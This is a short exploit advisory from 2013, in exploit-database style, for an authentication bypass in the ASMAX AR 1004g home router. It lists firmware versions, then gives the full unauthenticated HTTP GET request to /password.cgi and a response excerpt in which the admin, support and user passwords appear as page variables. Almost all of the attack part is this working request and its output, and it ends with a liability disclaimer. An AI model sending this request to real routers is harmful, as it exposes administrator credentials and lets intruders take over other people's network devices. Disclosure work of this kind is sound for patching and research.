# Exploit Title: ASMAX AR 1004g Authentication Bypass
# Date: 30.01.2013
# Exploit Author: lucyoa
# Vendor Homepage: asmax.pl
ASMAX AR 1004g is the most popular router device from asmax.
------------------- Device Info --------------------------
Board ID: 96333EW
Software Version: AR1004g-V2-B014
Bootloader (CFE) Version: before 1.0.37-5.12
Wireless Driver Version: 4.174.64.19.cpe1.0sd
------------------- Exploit ------------------------------
Request for password.cgi:
GET /password.cgi HTTP/1.1
Host: 10.0.0.2
User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+
xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Response:
(..)
pwdAdmin = 'admin_password';
pwdSupport = 'support_password';
pwdUser = 'user_password';
(..)
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information